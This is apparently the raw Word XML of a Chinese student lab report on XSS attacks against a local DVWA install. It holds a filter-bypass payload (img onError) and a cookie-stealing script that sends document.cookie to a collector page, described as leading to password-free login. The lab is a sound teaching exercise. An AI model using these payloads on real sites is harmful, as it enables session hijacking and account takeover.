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60pt" o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1741151949" r:id="rId9"/>
        </w:object>
      </w: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354199">
        <w:rPr>
          <w:rFonts w:ascii="楷体_GB2312" w:eastAsia="楷体_GB2312"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>20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354199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354199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:rsidR="00F2737B" w:rsidRPr="003630FB" w:rsidRDefault="00354199" w:rsidP="001365C9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6870"/>
              </w:tabs>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003630FB">
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidR="00E30130" w:rsidRPr="003630FB">
              <w:rPr>
                <w:sz w:val="30"/>
              </w:rPr>
              <w:t>安全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3630FB" w:rsidRDefault="00E07D32" w:rsidP="009D78ED">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6870"/>
              </w:tabs>
              <w:ind w:firstLineChars="800" w:firstLine="224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跨站脚本</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>攻击实验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2737B" w:rsidRPr="00E30130" w:rsidRDefault="00E30130" w:rsidP="0009666C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354199">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0009666C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2737B" w:rsidRPr="00E30130" w:rsidRDefault="00E07D32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2737B" w:rsidRPr="00E30130" w:rsidRDefault="0009666C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737B" w:rsidRPr="00137AE1" w:rsidRDefault="00F2737B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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl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>
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/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:rsidR="00F2737B" w:rsidRPr="00E30130" w:rsidRDefault="00F2737B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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1453" w:type="dxa"/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:rsidR="00F2737B" w:rsidRPr="00E30130" w:rsidRDefault="00F2737B" w:rsidP="00077894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bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2737B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77"/>
        <w:gridCol w:w="1060"/>
        <w:gridCol w:w="39"/>
        <w:gridCol w:w="1153"/>
        <w:gridCol w:w="299"/>
        <w:gridCol w:w="1266"/>
        <w:gridCol w:w="1120"/>
        <w:gridCol w:w="449"/>
        <w:gridCol w:w="2621"/>
      </w:tblGrid>
      <w:tr w:rsidR="00051FF4" w:rsidTr="00F24A28">
        <w:trPr>
          <w:trHeight w:val="637"/>
        </w:trPr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:rsidR="00F2737B" w:rsidRPr="003630FB" w:rsidRDefault="00E07D32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proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>跨站脚本</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="28"/>
              </w:rPr>
              <w:t>攻击实验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E85B6B" w:rsidTr="00F24A28"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:rsidR="00F2737B" w:rsidRPr="003630FB" w:rsidRDefault="00F2737B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r w:rsidRPr="003630FB">
              <w:rPr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:rsidR="00F2737B" w:rsidRPr="000F145C" w:rsidRDefault="00077894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color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>022.4.11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2737B" w:rsidTr="00F24A28">
        <w:trPr>
          <w:trHeight w:val="3050"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9521" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
          </w:tcPr>
          <w:p w:rsidR="00F2737B" w:rsidRDefault="00F2737B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:rsidR="003630FB" w:rsidRPr="003630FB" w:rsidRDefault="00DC4E13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在</w:t>
            </w:r>
            <w:r w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidR="00936AF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00936AF3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>环境下安装</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003630FB" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>Apache+PHP+MySql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="003630FB" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>环境</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EA61EF" w:rsidRPr="003630FB" w:rsidRDefault="003630FB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安装</w:t>
            </w:r>
            <w:r w:rsidR="00305E67" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>DVWA</w:t>
            </w:r>
            <w:r w:rsidR="00936AF3" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D78ED" w:rsidRPr="00EA61EF" w:rsidRDefault="009D78ED" w:rsidP="003630FB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2116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:rsidR="00DC4E13" w:rsidRPr="003630FB" w:rsidRDefault="00E0064D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1.</w:t>
            </w:r>
            <w:r w:rsidR="00DC4E13" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>安装</w:t>
            </w:r>
            <w:r w:rsidR="00DC4E13" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidR="00936AF3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>/Linux</w:t>
            </w:r>
            <w:r w:rsidR="00DC4E13" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>操作系统并连接网络的</w:t>
            </w:r>
            <w:r w:rsidR="00936AF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00936AF3">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>-2</w:t>
            </w:r>
            <w:r w:rsidR="00DC4E13" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>台</w:t>
            </w:r>
            <w:r w:rsidR="00DC4E13" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>PC</w:t>
            </w:r>
            <w:r w:rsidR="00DC4E13" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>机。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F2737B" w:rsidRPr="003630FB" w:rsidRDefault="00EA61EF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2.</w:t>
            </w:r>
            <w:r w:rsidR="009D78ED" w:rsidRPr="003630FB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00305E67" w:rsidRPr="003630FB">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>Apache+PHP+MySQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="00305E67" w:rsidRDefault="00305E67" w:rsidP="00305E6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3.DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F2737B" w:rsidRPr="00051FF4" w:rsidTr="00F24A28">
        <w:trPr>
          <w:trHeight w:val="70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:rsidR="00594542" w:rsidRPr="00594542" w:rsidRDefault="00555C6B" w:rsidP="00594542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1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完成任务二步骤（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3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），截取显示学号</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/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的弹窗窗口</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00594542" w:rsidRPr="00522739" w:rsidRDefault="00594542" w:rsidP="00594542">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="420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打开</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK "http://127.0.0.1/DVWA/index.php" </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://127.0.0.1/DVWA/index.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidR="00416A14" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>相比较中级而言，高级对</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>nam</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>参数多了对</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>严格的过滤</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>没有对别的标签做过滤</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>但可以通过别的</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>html</w:t>
            </w:r>
            <w:r w:rsidR="001411FE" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>标签来进行绕过</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。比如：</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;img src=x onError=alert('xss')&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。在浏览器窗口中查看文本框元素，按</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>调出，找到对应的文本框，双击</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>maxlength</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，把数值为</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00594542" w:rsidRPr="00594542" w:rsidRDefault="00594542" w:rsidP="00594542">
            <w:pPr>
              <w:ind w:firstLineChars="300" w:firstLine="630"/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BF1BCF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85725</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="4644826" cy="2491740"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="381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826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29AD" w:rsidRPr="00594542" w:rsidRDefault="00E529AD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rPr>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002A5D9A" w:rsidRPr="00E529AD" w:rsidRDefault="002A5D9A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  <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00936AF3" w:rsidRDefault="00936AF3" w:rsidP="00594542">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00522739" w:rsidRPr="00522739" w:rsidRDefault="00522739" w:rsidP="00594542">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00936AF3" w:rsidRPr="00936AF3" w:rsidRDefault="007D0FFD" w:rsidP="00936AF3">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001411FE">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>2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完成任务三，说明两个关键点：（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1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）如何获取受害者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A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的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Cookie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，（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2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）攻击者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B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如何利用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Cookie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实现无密码登录，适当截图记录。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F90090" w:rsidRPr="007D0FFD" w:rsidRDefault="00936AF3" w:rsidP="00936AF3">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00936AF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>欢迎</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>探索</w:t>
            </w:r>
            <w:r w:rsidRPr="00936AF3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="30"/>
                <w:szCs w:val="51"/>
              </w:rPr>
              <w:t>不同的渗透思路，体会攻击的危害，加强防范意识。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00936AF3" w:rsidRDefault="00936AF3" w:rsidP="00013955">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/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  <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00013955" w:rsidRPr="00013955" w:rsidRDefault="00013955" w:rsidP="00013955">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/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  <w:lang w:val="pt-BR"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00762C6F" w:rsidRPr="00522739" w:rsidRDefault="00762C6F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因为只有一台电脑所以演示的攻击者和受害者在同一台电脑上模拟。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00762C6F" w:rsidRDefault="00762C6F" w:rsidP="00051FF4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00013955" w:rsidRPr="00522739" w:rsidRDefault="00013955" w:rsidP="00051FF4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00936AF3" w:rsidRPr="00522739" w:rsidRDefault="00762C6F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首先</w:t>
            </w:r>
            <w:r w:rsidR="00914846" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>htdocs</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>文件夹下新建</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie.</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>内容如下</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00051FF4" w:rsidRDefault="00051FF4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9B3D2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07950</wp:posOffset>
                  </wp:positionV>
                  <wp:extent cx="5939790" cy="1903095"/>
                  <wp:effectExtent l="0" t="0" r="3810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6AF3" w:rsidRDefault="00936AF3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936AF3" w:rsidRDefault="00936AF3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936AF3" w:rsidRDefault="00936AF3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936AF3" w:rsidRPr="003630FB" w:rsidRDefault="00936AF3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Pr="00522739" w:rsidRDefault="00051FF4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目的是</w:t>
            </w:r>
            <w:r w:rsidR="00762C6F" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>充当攻击者自己的服务器，</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>为了将获取到的</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>，保存到</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie.php</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>所在目录下自动生成一个</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie.txt</w:t>
            </w:r>
            <w:r w:rsidR="00762C6F" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00051FF4" w:rsidRPr="00522739" w:rsidRDefault="00051FF4" w:rsidP="00051FF4">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="exact"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00051FF4" w:rsidRPr="00522739" w:rsidRDefault="00DC6FD7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接着</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>构造</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>payload</w:t>
            </w:r>
            <w:r w:rsidR="00051FF4" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>如下</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00051FF4" w:rsidRPr="00522739" w:rsidRDefault="00051FF4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color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;script&gt;document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00051FF4" w:rsidRPr="00522739" w:rsidRDefault="00051FF4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这样，所有执行这段</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>语句的人都将</w:t>
            </w:r>
            <w:r w:rsidR="00DC6FD7" w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>向</w:t>
            </w:r>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidR="00DC6FD7" w:rsidRPr="00522739">
                <w:rPr>
                  <w:color w:val="000000"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>http://127.0.0.1/cookie.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>上传</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>自己的</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="00522739">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>参数。</w:t>
            </w:r>
          </w:p>
